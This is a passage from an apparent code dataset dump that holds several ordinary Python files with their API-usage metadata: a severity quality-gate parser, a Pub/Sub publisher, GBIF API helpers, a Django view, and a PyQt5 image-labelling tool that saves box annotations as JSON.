"usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 124, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 124, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 128, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 131, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 131, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 134, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 134, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 139, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 139, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 144, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 144, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 145, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 150, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 156, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 156, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 159, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 170, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 170, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 187, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 187, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 192, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 192, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 195, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 237, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 237, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 240, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 240, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 241, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 241, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 242, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 245, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 245, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 248, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 248, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 251, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 251, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 252, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 252, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", 
"line_number": 255, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 255, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 256, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 256, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 257, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 257, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 258, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 258, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 259, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 259, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 260, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 260, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 263, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 268, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 268, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 292, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 292, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 305, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 305, "usage_type": "name"}]} +{"seq_id": "171847041", "text": "from collections import Counter\n\nfrom finding.finding import Severity\n\n\nclass QualityGate(Counter):\n def __init__(self, *args, **kwargs):\n super(QualityGate, self).__init__(*args, **kwargs)\n\n @classmethod\n def parse(cls, value, sep=\"/\", keys=None, ignore=False):\n if not value:\n raise ValueError(\"Input is {}\".format(\"none\" if value is None else \"empty\"))\n\n if not sep:\n raise ValueError(\"Separator is {}\".format(\"none\" if sep is None else \"empty\"))\n\n if keys is None:\n keys = [x.name() for x in Severity if x > Severity.INFO]\n keys.reverse()\n\n args = value.split(sep=sep, maxsplit=len(keys))\n\n if not ignore and len(args) != len(keys):\n raise ValueError(\"Number of values does not match to number of keys: {} (expected: {})\".format(len(keys), len(args)))\n\n tmp = dict(zip(keys, [int(x) for x in args]))\n\n return QualityGate(tmp)\n\n def test(self, **kwargs):\n if kwargs is None:\n return dict()\n\n for key, value in kwargs.items():\n if key in self and self[key] > kwargs[key]:\n yield key, value\n", "sub_path": "utils/quality.py", "file_name": "quality.py", "file_ext": "py", "file_size_in_byte": 1166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 6, "usage_type": "name"}, {"api_name": "finding.finding.Severity", "line_number": 19, "usage_type": "name"}, {"api_name": "finding.finding.Severity.INFO", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "209265906", "text": "from google.cloud import pubsub_v1\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(\"babylon-258211\",\"babylon-topic\")\n\nf = open(\"babylon.json\", \"r\")\nfor appointment in f:\n\tprint(appointment)\n\tfuture = publisher.publish(topic_path, 
data=appointment.encode('utf-8'))\n\tprint(future.result())\nf.close()\n\n", "sub_path": "producer/producer.py", "file_name": "producer.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.pubsub_v1.PublisherClient", "line_number": 3, "usage_type": "call"}, {"api_name": "google.cloud.pubsub_v1", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "92726024", "text": "#!/usr/bin/python3\nimport requests\nfrom leia_api.constants import GBIF_API_SUGGEST_URL, GBIF_API_DISTRIBUTIONS_PREFIX_URL, GBIF_API_DISTRIBUTIONS_SUFFIX_URL\n\n\ndef get_gbif_taxonomy(name: str):\n payload = {'q': name, 'limit': 1}\n gbif_request = requests.get(url=GBIF_API_SUGGEST_URL, params=payload)\n gbif_response = gbif_request.json()\n return gbif_response\n\n\ndef get_gbif_distributions(key: str):\n gbif_request = requests.get(\n url=GBIF_API_DISTRIBUTIONS_PREFIX_URL + str(key) + GBIF_API_DISTRIBUTIONS_SUFFIX_URL)\n gbif_response = gbif_request.json()\n return gbif_response\n", "sub_path": "backend/leia_api/helpers/gbif.py", "file_name": "gbif.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "leia_api.constants.GBIF_API_SUGGEST_URL", "line_number": 8, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "leia_api.constants.GBIF_API_DISTRIBUTIONS_PREFIX_URL", "line_number": 15, "usage_type": "name"}, {"api_name": "leia_api.constants.GBIF_API_DISTRIBUTIONS_SUFFIX_URL", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "379206363", "text": "from django.shortcuts import render\nfrom Property.models import Property, Category\nfrom django.db.models import Count\n\n# Create your views here.\ndef home(request):\n\n category_list = Category.objects.annotate(count = Count('property')).values('name', 'count', 'image')\n print(category_list)\n template = 'home.html'\n context = { \n 'category_list' : category_list,\n }\n return render(request, template, context)", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 432, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Property.models.Category.objects.annotate", "line_number": 8, "usage_type": "call"}, {"api_name": "Property.models.Category.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Property.models.Category", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "361350654", "text": "# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file_name: labelimg_six.py\n# author: ScCcWe\n# time: 2020/4/23 9:29\n\"\"\"\n框选 + 标记工具,框选借鉴labelimg,标记自己搭建\n\"\"\"\nimport os\nimport sys\n\nif hasattr(sys, 'frozen'):\n os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\n\nimport copy\nimport json\nfrom natsort import natsorted\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom UI_six import Ui_MainWindow\nfrom libs.canvas import Canvas\nfrom libs.shape import Shape\nfrom images import *\n\n__appname__ = 'label_SIX'\nFORMAT_DICT_DICT_LIST = {'backlight': ['yes', 'no'],\n 'hasGlove': ['yes', 'no'],\n 
'resolution': ['clear', 'blur', 'dark', 'invisible'],\n 'immerse': ['yes', 'no'],\n 'lightOn': ['on', 'off'],\n 'integrity': ['full', '80%+', '80%-', 'nodevice'],\n 'angle': ['front', 'side']}\nFORMAT_DICT_KEY_LIST = ['backlight', 'hasGlove', 'resolution', 'immerse', 'lightOn', 'integrity', 'angle']\nFORMAT_DICT_DEFAULT = {FORMAT_DICT_KEY_LIST[0]: 'no',\n FORMAT_DICT_KEY_LIST[1]: 'no',\n FORMAT_DICT_KEY_LIST[2]: 'clear',\n FORMAT_DICT_KEY_LIST[3]: 'no',\n FORMAT_DICT_KEY_LIST[4]: 'on',\n FORMAT_DICT_KEY_LIST[5]: 'full',\n FORMAT_DICT_KEY_LIST[6]: 'front'}\n\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n CREATE, EDIT = list(range(2))\n \n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n __appicon__ = QtGui.QIcon(\":/icons/\" + 'pipi.jpg')\n self.setWindowIcon(__appicon__) # 设置主程序图标\n self.setWindowTitle(__appname__) # 设置主程序标题\n self.dir_list = None # 文件列表(打开的全部)\n self.dir_quantity = 0 # 文件总数\n self.seleDir = None # 文件父路径\n self.dir_show_num = 0 # 当前文件的index\n \n self.exampleDict = self.set_format_dict() # 标注字典格式\n self.tempDict = None # 实际使用的字典壳子,通过深拷贝(copy.deepcopy())\n \n self.set_button_icons() # 设置按钮的图标\n self.init_button_setting() # 初始化按钮的设置\n \n self.button_list = [self.pushButton_backlight_yes,\n self.pushButton_backlight_no,\n self.pushButton_hasGlove_yes,\n self.pushButton_hasGlove_no,\n self.pushButton_resolution_clear,\n self.pushButton_resolution_blur,\n self.pushButton_resolution_dark,\n self.pushButton_resolution_invisible,\n self.pushButton_immerse_yes,\n self.pushButton_immerse_no,\n self.pushButton_lightOn_on,\n self.pushButton_lightOn_off,\n self.pushButton_integrity_full,\n self.pushButton_integrity_complete,\n self.pushButton_integrity_incomplete,\n self.pushButton_integrity_nodevice,\n self.pushButton_angle_front,\n self.pushButton_angle_side]\n \n self._noSelectionSlot = False\n \n self.listWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)\n \n self.canvas = Canvas()\n self.cursor = self.canvas.cursor\n self.scrollArea.setWidget(self.canvas)\n # self.canvas.scrollRequest.connect(self.scrollRequest)\n self.canvas.newShape.connect(self.newShape)\n # self.canvas.shapeMoved.connect(self.setDirty)\n self.canvas.selectionChanged.connect(self.shapeSelectionChanged)\n # self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)\n \n # 初始化时就设置自动保存\n self.action_autosave.setCheckable(True)\n self.action_autosave.setChecked(True)\n \n @staticmethod\n def set_format_dict():\n # 得到一个标注格式的字典壳子\n a = {}\n for i in FORMAT_DICT_KEY_LIST:\n a[i] = ''\n return a\n \n def set_button_icons(self):\n self.action_root.setIcon(QtGui.QIcon(\":/icons/open.png\"))\n self.action_pre.setIcon(QtGui.QIcon(\":/icons/prev.png\"))\n self.action_next.setIcon(QtGui.QIcon(\":/icons/next.png\"))\n self.action_edit.setIcon(QtGui.QIcon(\":/icons/edit.png\"))\n self.action_rect.setIcon(QtGui.QIcon(\":/icons/objects.png\"))\n self.action_save.setIcon(QtGui.QIcon(\":/icons/save.png\"))\n self.action_delete.setIcon(QtGui.QIcon(\":/icons/delete.png\"))\n self.action_autosave.setIcon(QtGui.QIcon(\":/icons/done.png\"))\n self.action_copy.setIcon(QtGui.QIcon(\":/icons/copy.png\"))\n \n def init_button_setting(self):\n self.action_next.setEnabled(False)\n self.action_pre.setEnabled(False)\n self.action_save.setEnabled(False)\n self.action_rect.setEnabled(False)\n self.action_edit.setEnabled(False)\n self.action_delete.setEnabled(False)\n self.action_copy.setEnabled(False)\n \n def init_button_func(self):\n 
self.action_next.setEnabled(True)\n self.action_pre.setEnabled(True)\n self.action_save.setEnabled(True)\n self.action_rect.setEnabled(True)\n \n def deleteSelectedShape(self):\n shape = self.canvas.deleteSelected()\n if shape:\n self.init_color()\n self.action_edit.setEnabled(False)\n self.action_delete.setEnabled(False)\n \n # React to canvas signals. (对画布信号做出反应)\n # 具体反应在list中, 还有rect本身\n def shapeSelectionChanged(self, selected=False):\n if self._noSelectionSlot: # 如果用户没有选择rect(初始值即为False), 将re(这是防止出现错误)\n self._noSelectionSlot = False\n else:\n shape = self.canvas.selectedShape # self.canvas.selectedShape:当前选中的rect\n if shape:\n self.tempDict = shape.label\n self.showStatus(shape.label)\n else:\n self.init_color()\n self.action_edit.setEnabled(selected)\n self.action_delete.setEnabled(selected)\n # self.action_copy.setEnabled(selected)\n \n def newShape(self):\n json_data = copy.deepcopy(FORMAT_DICT_DEFAULT)\n self.canvas.mode_to_edit()\n if json_data is not None:\n self.canvas.setLastLabel(json_data)\n self.tempDict = json_data\n self.showStatus(json_data)\n \n def copyShape(self):\n self.canvas.endMove(copy=True)\n labels = self.canvas.selectedShape.label\n self.canvas.copySelectedShape()\n self.canvas.setLastLabel(labels)\n \n def moveShape(self):\n self.canvas.endMove(copy=False)\n # self.setDirty()\n \n def copySelectedShape(self):\n labels = self.canvas.selectedShape.label\n self.canvas.copySelectedShape()\n self.canvas.setLastLabel(labels)\n \n # fix copy and delete\n # self.shapeSelectionChanged(True)\n \n def save_current_json(self):\n \"\"\"以json格式保存(ctrl+s)\n \"\"\"\n def format_shape(s):\n return dict(labels=s.label,\n position=[{'x': int(p.x()), 'y': int(p.y())} for index, p in enumerate(s.points) if index == 0 or index == 2])\n if self.canvas.shapes:\n shapes = [format_shape(shape) for shape in self.canvas.shapes]\n self.save_as_json(shapes)\n else:\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n if os.path.exists(json_path):\n os.remove(json_path)\n \n def save_as_json(self, data):\n \"\"\"以json格式保存label\"\"\"\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n with open(json_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(data, f, indent=4, ensure_ascii=False)\n \n def fileitemDoubleClicked(self, item=None):\n # 在跳转前需要先保存当前的json\n self.save_current_json()\n \n currIndex = self.dir_list.index((item.text()))\n if currIndex < len(self.dir_list):\n self.dir_show_num = currIndex\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n \n def show_filenames_in_list_widget(self, param_img_list):\n \"\"\"将img展示在listWidget中\"\"\"\n for index, imgPath in enumerate(param_img_list):\n item = QtWidgets.QListWidgetItem(imgPath)\n self.listWidget.addItem(item)\n \n def func_message_show(self, param_string):\n \"\"\"用户提示框\"\"\"\n QtWidgets.QMessageBox.warning(\n self, 'WARNING', param_string,\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.Yes\n )\n \n def show_img_list_change(self):\n \"\"\"增加用户识别,会让读取的dir,有一种印上去的感觉\"\"\"\n self.listWidget.item(self.dir_show_num).setSelected(True)\n \n def get_natsorted_file_list(self):\n if self.seleDir is not None:\n file_list = []\n for file in os.listdir(self.seleDir):\n if file.lower().endswith('.png') or file.lower().endswith('.jpg') or file.lower().endswith('.jepg'):\n file_list.append(file)\n return natsorted(file_list)\n \n def select_root_dir(self):\n \"\"\"选择文件夹\"\"\"\n # re\n self.dir_list = 
None\n self.dir_show_num = 0\n self.canvas.shapes = []\n \n # func\n self.seleDir = QtWidgets.QFileDialog.getExistingDirectory(self, '请选择打开的目录')\n if self.seleDir == '':\n return\n self.deal_with_dir_list()\n self.init_button_func()\n \n def deal_with_dir_list(self):\n self.dir_list = self.get_natsorted_file_list()\n \n self.listWidget.clear()\n self.show_filenames_in_list_widget(self.dir_list)\n \n self.dir_quantity = len(self.dir_list)\n self.label_all.setText('/' + str(self.dir_quantity))\n self.label_one.setText(\"当前:\" + str(self.dir_show_num + 1)) # 0+1=1\n \n self.show_img_list_change()\n \n # 展示图片和路径\n self.show_path_name()\n self.showImg()\n \n # json\n self.forward_json()\n \n # 让使用者直观的看到变化\n if self.tempDict:\n self.showStatus(self.tempDict)\n \n def show_path_name(self):\n if self.dir_list[self.dir_show_num]:\n self.label_dirName.setText(\"当前处理的路径为:\" + self.seleDir + '/' + self.dir_list[self.dir_show_num])\n \n def json_data_dis(self, json_data, param_label):\n if param_label in json_data.keys():\n self.tempDict[param_label] = json_data[param_label]\n \n def forward_json(self):\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n \n if os.path.exists(json_path):\n with open(json_path, \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n # self.tempDict = data[0]['labels']\n # print(self.tempDict)\n # print(data)\n for shape in data:\n points = shape['position']\n label = shape['labels']\n start_point = QtCore.QPointF(points[0]['x'], points[0]['y']) # 左上\n end_point = QtCore.QPointF(points[1]['x'], points[1]['y']) # 右下\n \n two_points = Shape()\n two_points.addPoint(start_point)\n two_points.addPoint(end_point)\n four_points = self.canvas.points_to_point_four(copy.deepcopy(two_points))\n \n with_points_shape = Shape()\n with_points_shape.points = four_points\n with_points_shape.close() # 闭合最后一条线\n self.canvas.shapes.append(with_points_shape)\n self.canvas.shapes[-1].label = label\n self.canvas.repaint()\n else:\n self.tempDict = copy.deepcopy(self.exampleDict)\n \n def showImg(self):\n # 图片展示\n # print(self.seleDir + '/' + self.dir_list[self.dir_show_num])\n # C:/Users/hwx827939/Desktop/pic/20200310-094603(eSpace).png\n self.canvas_show_sth(self.seleDir + '/' + self.dir_list[self.dir_show_num])\n \n # 图片信息展示\n self.label_one.setText(\"当前:\" + str(self.dir_show_num + 1))\n \n def canvas_show_sth(self, imagepath):\n # imagepath = r'D:\\task\\300\\0300_310.jpg'\n image = QtGui.QImage(imagepath)\n self.canvas.load_pixmap(QtGui.QPixmap.fromImage(image))\n \n # canvas fit window\n self.file_or_dir_fit_window()\n \n def file_or_dir_fit_window(self):\n self.canvas.scale = self.scale_fit_window() # 随之变动\n self.canvas.repaint()\n \n def scale_fit_window(self):\n e = 2.0 # So that no scrollbars are generated.\n w1 = self.scrollArea.width() - e\n h1 = self.scrollArea.height() - e\n a1 = w1 / h1 # 宽高比a1 例如:16:9\n w2 = self.canvas.pixmap.width() - 0.0\n h2 = self.canvas.pixmap.height() - 0.0\n a2 = w2 / h2\n return w1 / w2 if a2 >= a1 else h1 / h2\n \n def last_dir(self):\n if self.dir_list is not None:\n if self.action_autosave.isChecked():\n self.save_current_json()\n if self.dir_show_num > 0:\n self.canvas.shapes = []\n self.dir_show_num -= 1\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n self.forward_json()\n \n def next_dir(self):\n if self.dir_list is not None:\n # 自动保存\n if self.action_autosave.isChecked():\n self.save_current_json()\n \n if self.dir_show_num < self.dir_quantity - 1:\n # re\n 
self.canvas.shapes = []\n \n # func\n self.dir_show_num += 1\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n self.forward_json()\n \n def creating(self):\n return self.mode == self.CREATE\n \n def editing(self):\n return self.mode == self.EDIT\n \n def mode_to_create(self):\n self.canvas.mode_to_create()\n \n def mode_to_edit(self):\n self.canvas.mode_to_edit()\n \n def init_color(self):\n self.button_list[0].setStyleSheet(\"\")\n self.button_list[1].setStyleSheet(\"\")\n self.button_list[2].setStyleSheet(\"\")\n self.button_list[3].setStyleSheet(\"\")\n self.button_list[4].setStyleSheet(\"\")\n self.button_list[5].setStyleSheet(\"\")\n self.button_list[6].setStyleSheet(\"\")\n self.button_list[7].setStyleSheet(\"\")\n self.button_list[8].setStyleSheet(\"\")\n self.button_list[9].setStyleSheet(\"\")\n self.button_list[10].setStyleSheet(\"\")\n self.button_list[11].setStyleSheet(\"\")\n self.button_list[12].setStyleSheet(\"\")\n self.button_list[13].setStyleSheet(\"\")\n self.button_list[14].setStyleSheet(\"\")\n self.button_list[15].setStyleSheet(\"\")\n self.button_list[16].setStyleSheet(\"\")\n self.button_list[17].setStyleSheet(\"\")\n \n def color(self, label_dict, param_attribute, param_state, param_button):\n if label_dict[param_attribute] == param_state:\n param_button.setStyleSheet(\"background-color: rgb(49, 247, 244);\")\n else:\n param_button.setStyleSheet(\"\")\n \n def showStatus(self, label_dict):\n self.color(label_dict, FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][0], self.button_list[0])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][1], self.button_list[1])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][0], self.button_list[2])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][1], self.button_list[3])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][0], self.button_list[4])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][1], self.button_list[5])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][2], self.button_list[6])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][3], self.button_list[7])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][0], self.button_list[8])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][1], self.button_list[9])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][0], self.button_list[10])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][1], self.button_list[11])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][0], self.button_list[12])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][1], self.button_list[13])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][2], self.button_list[14])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][3], self.button_list[15])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][0], self.button_list[16])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][1], self.button_list[17])\n \n def input_json_data(self, param_attribute, param_state):\n self.tempDict[param_attribute] = 
param_state\n self.showStatus(self.tempDict)\n \n def backlight_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][0])\n \n def backlight_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][1])\n \n def hasGlove_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][0])\n \n def hasGlove_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][1])\n \n def resolution_clear(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][0])\n \n def resolution_blur(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][1])\n \n def resolution_dark(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][2])\n \n def resolution_invisible(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][3])\n \n def immerse_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][0])\n \n def immerse_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][1])\n \n def lightOn_on(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][0])\n \n def lightOn_off(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][1])\n \n def integrity_full(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][0])\n \n def integrity_complete(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][1])\n \n def integrity_incomplete(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][2])\n \n def integrity_nodevice(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][3])\n \n def angle_front(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][0])\n \n def angle_side(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][1])\n\n\ndef get_main_app():\n app = QtWidgets.QApplication(sys.argv)\n win = MainWindow()\n win.showMaximized()\n return app, win\n\n\ndef main():\n app, win = get_main_app()\n return app.exec_()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n", "sub_path": "pip下载��模块moudle/pyqt5/labelsix/label_six.py", "file_name": "label_six.py", "file_ext": "py", "file_size_in_byte": 21272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys._MEIPASS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "UI_six.Ui_MainWindow", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 49, "usage_type": "name"}, {"api_name": "libs.canvas.Canvas", "line_number": 86, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 109, "usage_type": 
"name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 112, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 114, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 114, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 116, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, 